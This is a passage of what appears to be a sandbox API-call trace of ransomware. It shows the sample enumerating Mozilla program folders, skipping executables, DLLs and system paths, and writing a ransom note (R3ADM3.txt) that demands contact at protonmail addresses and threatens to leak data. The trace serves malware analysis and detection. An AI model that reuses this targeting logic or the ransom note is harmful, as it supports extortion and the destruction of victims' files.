ftLastWriteTime.dwLowDateTime=0x13c55480, ftLastWriteTime.dwHighDateTime=0x1ced1dd, nFileSizeHigh=0x0, nFileSizeLow=0x8f3b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="removed-files", cAlternateFileName="REMOVE~1")) returned 1 [0139.740] lstrcmpW (lpString1="removed-files", lpString2=".") returned 1 [0139.740] lstrcmpW (lpString1="removed-files", lpString2="..") returned 1 [0139.740] StrStrIW (lpFirst="removed-files", lpSrch=".UAKXC") returned 0x0 [0139.740] StrStrIW (lpFirst="removed-files", lpSrch=".exe") returned 0x0 [0139.740] StrStrIW (lpFirst="removed-files", lpSrch=".dll") returned 0x0 [0139.740] StrStrIW (lpFirst="removed-files", lpSrch=".lnk") returned 0x0 [0139.740] StrStrIW (lpFirst="removed-files", lpSrch=".sys") returned 0x0 [0139.740] StrStrIW (lpFirst="removed-files", lpSrch=".msi") returned 0x0 [0139.741] StrStrIW (lpFirst="removed-files", lpSrch="R3ADM3.txt") returned 0x0 [0139.741] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed058 [0139.741] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.741] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2b58 [0139.741] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0139.741] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2b58 | out: hHeap=0xea0000) returned 1 [0139.741] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.741] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed058 | out: hHeap=0xea0000) returned 1 [0139.741] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee7e8 [0139.741] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed058 [0139.741] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeab8 [0139.741] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee7e8 | out: hHeap=0xea0000) returned 1 [0139.741] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0139.741] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf157600, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf157600, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x3744cb00, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x383, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="softokn3.chk", cAlternateFileName="")) returned 1 [0139.741] lstrcmpW (lpString1="softokn3.chk", lpString2=".") returned 1 [0139.741] lstrcmpW (lpString1="softokn3.chk", lpString2="..") returned 1 [0139.741] StrStrIW (lpFirst="softokn3.chk", lpSrch=".UAKXC") returned 0x0 [0139.741] StrStrIW (lpFirst="softokn3.chk", lpSrch=".exe") returned 0x0 [0139.741] StrStrIW (lpFirst="softokn3.chk", lpSrch=".dll") returned 0x0 [0139.741] StrStrIW (lpFirst="softokn3.chk", lpSrch=".lnk") returned 0x0 [0139.741] StrStrIW (lpFirst="softokn3.chk", lpSrch=".sys") returned 0x0 [0139.741] StrStrIW (lpFirst="softokn3.chk", lpSrch=".msi") returned 0x0 [0139.741] StrStrIW (lpFirst="softokn3.chk", lpSrch="R3ADM3.txt") returned 0x0 [0139.741] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed080 [0139.742] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.742] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2b58 [0139.742] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0139.742] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2b58 | out: hHeap=0xea0000) returned 1 [0139.742] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.742] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed080 | out: hHeap=0xea0000) returned 1 [0139.742] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee7e8 [0139.742] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed080 [0139.742] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeb30 [0139.742] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee7e8 | out: hHeap=0xea0000) returned 1 [0139.742] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0139.742] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf157600, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf157600, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x3744cb00, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x25870, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="softokn3.dll", cAlternateFileName="")) returned 1 [0139.742] lstrcmpW (lpString1="softokn3.dll", lpString2=".") returned 1 [0139.742] lstrcmpW (lpString1="softokn3.dll", lpString2="..") returned 1 [0139.742] StrStrIW (lpFirst="softokn3.dll", lpSrch=".UAKXC") returned 0x0 [0139.742] StrStrIW (lpFirst="softokn3.dll", lpSrch=".exe") returned 0x0 [0139.742] StrStrIW (lpFirst="softokn3.dll", lpSrch=".dll") returned=".dll" [0139.742] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaef1c160, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb0925200, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0925200, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uninstall", cAlternateFileName="UNINST~1")) returned 1 [0139.742] lstrcmpW (lpString1="uninstall", lpString2=".") returned 1 [0139.742] lstrcmpW (lpString1="uninstall", lpString2="..") returned 1 [0139.742] StrStrIW (lpFirst="uninstall", lpSrch="tmp") returned 0x0 [0139.742] StrStrIW (lpFirst="uninstall", lpSrch="winnt") returned 0x0 [0139.742] StrStrIW (lpFirst="uninstall", lpSrch="temp") returned 0x0 [0139.742] StrStrIW (lpFirst="uninstall", lpSrch="thumb") returned 0x0 [0139.742] StrStrIW (lpFirst="uninstall", lpSrch="$Recycle.Bin") returned 0x0 [0139.742] StrStrIW (lpFirst="uninstall", lpSrch="$RECYCLE.BIN") returned 0x0 [0139.743] StrStrIW (lpFirst="uninstall", lpSrch="System Volume Information") returned 0x0 [0139.743] StrStrIW (lpFirst="uninstall", lpSrch="Boot") returned 0x0 [0139.743] StrStrIW (lpFirst="uninstall", lpSrch="Windows") returned 0x0 [0139.743] StrStrIW (lpFirst="uninstall", lpSrch="Trend Micro") returned 0x0 [0139.743] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed0a8 [0139.743] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.743] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2b58 [0139.743] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0139.743] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2b58 | out: hHeap=0xea0000) returned 1 [0139.743] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.743] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed0a8 | out: hHeap=0xea0000) returned 1 [0139.743] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed0a8 [0139.743] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee7e8 [0139.743] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0139.743] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf157600, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf157600, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x9f38e880, ftLastWriteTime.dwHighDateTime=0x1ced1d1, nFileSizeHigh=0x0, nFileSizeLow=0x89, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="update-settings.ini", cAlternateFileName="UPDATE~1.INI")) returned 1 [0139.743] lstrcmpW (lpString1="update-settings.ini", lpString2=".") returned 1 [0139.743] lstrcmpW (lpString1="update-settings.ini", lpString2="..") returned 1 [0139.743] StrStrIW (lpFirst="update-settings.ini", lpSrch=".UAKXC") returned 0x0 [0139.743] StrStrIW (lpFirst="update-settings.ini", lpSrch=".exe") returned 0x0 [0139.743] StrStrIW (lpFirst="update-settings.ini", lpSrch=".dll") returned 0x0 [0139.743] StrStrIW (lpFirst="update-settings.ini", lpSrch=".lnk") returned 0x0 [0139.743] StrStrIW (lpFirst="update-settings.ini", lpSrch=".sys") returned 0x0 [0139.743] StrStrIW (lpFirst="update-settings.ini", lpSrch=".msi") returned 0x0 [0139.743] StrStrIW (lpFirst="update-settings.ini", lpSrch="R3ADM3.txt") returned 0x0 [0139.743] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0139.743] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.743] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2b58 [0139.743] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd7f0 [0139.744] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2b58 | out: hHeap=0xea0000) returned 1 [0139.744] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.744] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0139.744] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd900 [0139.744] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed0d0 [0139.744] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedda98 [0139.744] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd900 | out: hHeap=0xea0000) returned 1 [0139.744] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd7f0 | out: hHeap=0xea0000) returned 1 [0139.744] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf17d760, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf17d760, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x37dd6180, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x42e70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="updater.exe", cAlternateFileName="")) returned 1 [0139.744] lstrcmpW (lpString1="updater.exe", lpString2=".") returned 1 [0139.744] lstrcmpW (lpString1="updater.exe", lpString2="..") returned 1 [0139.744] StrStrIW (lpFirst="updater.exe", lpSrch=".UAKXC") returned 0x0 [0139.744] StrStrIW (lpFirst="updater.exe", lpSrch=".exe") returned=".exe" [0139.744] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf17d760, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf17d760, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xac170580, ftLastWriteTime.dwHighDateTime=0x1ced1ec, nFileSizeHigh=0x0, nFileSizeLow=0x4dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="updater.ini", cAlternateFileName="")) returned 1 [0139.744] lstrcmpW (lpString1="updater.ini", lpString2=".") returned 1 [0139.744] lstrcmpW (lpString1="updater.ini", lpString2="..") returned 1 [0139.744] StrStrIW (lpFirst="updater.ini", lpSrch=".UAKXC") returned 0x0 [0139.744] StrStrIW (lpFirst="updater.ini", lpSrch=".exe") returned 0x0 [0139.744] StrStrIW (lpFirst="updater.ini", lpSrch=".dll") returned 0x0 [0139.744] StrStrIW (lpFirst="updater.ini", lpSrch=".lnk") returned 0x0 [0139.744] StrStrIW (lpFirst="updater.ini", lpSrch=".sys") returned 0x0 [0139.744] StrStrIW (lpFirst="updater.ini", lpSrch=".msi") returned 0x0 [0139.744] StrStrIW (lpFirst="updater.ini", lpSrch="R3ADM3.txt") returned 0x0 [0139.744] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed0f8 [0139.745] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.745] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2b58 [0139.745] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0139.745] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2b58 | out: hHeap=0xea0000) returned 1 [0139.745] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.745] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed0f8 | out: hHeap=0xea0000) returned 1 [0139.745] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeba8 [0139.745] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed0f8 [0139.745] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeec20 [0139.745] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeeba8 | out: hHeap=0xea0000) returned 1 [0139.745] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0139.745] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf17d760, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf17d760, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x3875f800, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x29bd0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="webapp-uninstaller.exe", cAlternateFileName="WEBAPP~1.EXE")) returned 1 [0139.745] lstrcmpW (lpString1="webapp-uninstaller.exe", lpString2=".") returned 1 [0139.745] lstrcmpW (lpString1="webapp-uninstaller.exe", lpString2="..") returned 1 [0139.745] StrStrIW (lpFirst="webapp-uninstaller.exe", lpSrch=".UAKXC") returned 0x0 [0139.745] StrStrIW (lpFirst="webapp-uninstaller.exe", lpSrch=".exe") returned=".exe" [0139.745] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf17d760, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf215ce0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf215ce0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="webapprt", cAlternateFileName="")) returned 1 [0139.745] lstrcmpW (lpString1="webapprt", lpString2=".") returned 1 [0139.745] lstrcmpW (lpString1="webapprt", lpString2="..") returned 1 [0139.745] StrStrIW (lpFirst="webapprt", lpSrch="tmp") returned 0x0 [0139.745] StrStrIW (lpFirst="webapprt", lpSrch="winnt") returned 0x0 [0139.745] StrStrIW (lpFirst="webapprt", lpSrch="temp") returned 0x0 [0139.745] StrStrIW (lpFirst="webapprt", lpSrch="thumb") returned 0x0 [0139.746] StrStrIW (lpFirst="webapprt", lpSrch="$Recycle.Bin") returned 0x0 [0139.746] StrStrIW (lpFirst="webapprt", lpSrch="$RECYCLE.BIN") returned 0x0 [0139.746] StrStrIW (lpFirst="webapprt", lpSrch="System Volume Information") returned 0x0 [0139.746] StrStrIW (lpFirst="webapprt", lpSrch="Boot") returned 0x0 [0139.746] StrStrIW (lpFirst="webapprt", lpSrch="Windows") returned 0x0 [0139.746] StrStrIW (lpFirst="webapprt", lpSrch="Trend Micro") returned 0x0 [0139.746] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed120 [0139.746] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.746] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2b58 [0139.746] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0139.746] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2b58 | out: hHeap=0xea0000) returned 1 [0139.746] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.746] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed120 | out: hHeap=0xea0000) returned 1 [0139.746] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed120 [0139.746] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec358 [0139.746] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0139.746] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf17d760, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf17d760, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x390e8e80, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x1a670, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="webapprt-stub.exe", cAlternateFileName="WEBAPP~2.EXE")) returned 1 [0139.746] lstrcmpW (lpString1="webapprt-stub.exe", lpString2=".") returned 1 [0139.746] lstrcmpW (lpString1="webapprt-stub.exe", lpString2="..") returned 1 [0139.746] StrStrIW (lpFirst="webapprt-stub.exe", lpSrch=".UAKXC") returned 0x0 [0139.746] StrStrIW (lpFirst="webapprt-stub.exe", lpSrch=".exe") returned=".exe" [0139.746] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf1a38c0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf1a38c0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x49266e00, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x1502070, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xul.dll", cAlternateFileName="")) returned 1 [0139.746] lstrcmpW (lpString1="xul.dll", lpString2=".") returned 1 [0139.747] lstrcmpW (lpString1="xul.dll", lpString2="..") returned 1 [0139.747] StrStrIW (lpFirst="xul.dll", lpSrch=".UAKXC") returned 0x0 [0139.747] StrStrIW (lpFirst="xul.dll", lpSrch=".exe") returned 0x0 [0139.747] StrStrIW (lpFirst="xul.dll", lpSrch=".dll") returned=".dll" [0139.747] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf1a38c0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf1a38c0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x49266e00, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x1502070, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xul.dll", cAlternateFileName="")) returned 0 [0139.747] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2b00 | out: hHeap=0xea0000) returned 1 [0139.747] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6c90 | out: hHeap=0xea0000) returned 1 [0139.747] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0139.747] Sleep (dwMilliseconds=0x32) [0139.847] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0139.847] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2d68 | out: hHeap=0xea0000) returned 1 [0139.847] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee6f8 [0139.847] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeba8 [0139.847] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeec98 [0139.847] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeeba8 | out: hHeap=0xea0000) returned 1 [0139.847] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeba8 [0139.847] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecf18 [0139.847] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeed10 [0139.847] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeed88 [0139.847] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xedab30 [0139.848] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeed88 | out: hHeap=0xea0000) returned 1 [0139.848] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeed10 | out: hHeap=0xea0000) returned 1 [0139.848] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecf18 | out: hHeap=0xea0000) returned 1 [0139.848] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Maintenance Service\\R3ADM3.txt" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c8 [0139.848] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0139.848] WriteFile (in: hFile=0x6c8, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0139.850] CloseHandle (hObject=0x6c8) returned 1 [0139.850] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab30 | out: hHeap=0xea0000) returned 1 [0139.850] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeeba8 | out: hHeap=0xea0000) returned 1 [0139.850] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Mozilla Maintenance Service\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf770e60, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x588b8830, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x588b8830, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0139.850] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0139.850] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf770e60, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x588b8830, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x588b8830, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0139.850] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0139.850] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0139.850] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26a02950, ftCreationTime.dwHighDateTime=0x1d5caf0, ftLastAccessTime.dwLowDateTime=0x26b4a020, ftLastAccessTime.dwHighDateTime=0x1d57c2a, ftLastWriteTime.dwLowDateTime=0x26b4a020, ftLastWriteTime.dwHighDateTime=0x1d57c2a, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="accupos.exe", cAlternateFileName="")) returned 1 [0139.850] lstrcmpW (lpString1="accupos.exe", lpString2=".") returned 1 [0139.850] lstrcmpW (lpString1="accupos.exe", lpString2="..") returned 1 [0139.850] StrStrIW (lpFirst="accupos.exe", lpSrch=".UAKXC") returned 0x0 [0139.850] StrStrIW (lpFirst="accupos.exe", lpSrch=".exe") returned=".exe" [0139.850] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf8093e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8093e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x2d22cc80, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x1d270, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="maintenanceservice.exe", cAlternateFileName="MAINTE~1.EXE")) returned 1 [0139.850] lstrcmpW (lpString1="maintenanceservice.exe", lpString2=".") returned 1 [0139.850] lstrcmpW (lpString1="maintenanceservice.exe", lpString2="..") returned 1 [0139.851] StrStrIW (lpFirst="maintenanceservice.exe", lpSrch=".UAKXC") returned 0x0 [0139.851] StrStrIW (lpFirst="maintenanceservice.exe", lpSrch=".exe") returned=".exe" [0139.851] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1405edb0, ftCreationTime.dwHighDateTime=0x1d579fc, ftLastAccessTime.dwLowDateTime=0xc24631e0, ftLastAccessTime.dwHighDateTime=0x1d5b99a, ftLastWriteTime.dwLowDateTime=0xc24631e0, ftLastWriteTime.dwHighDateTime=0x1d5b99a, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, 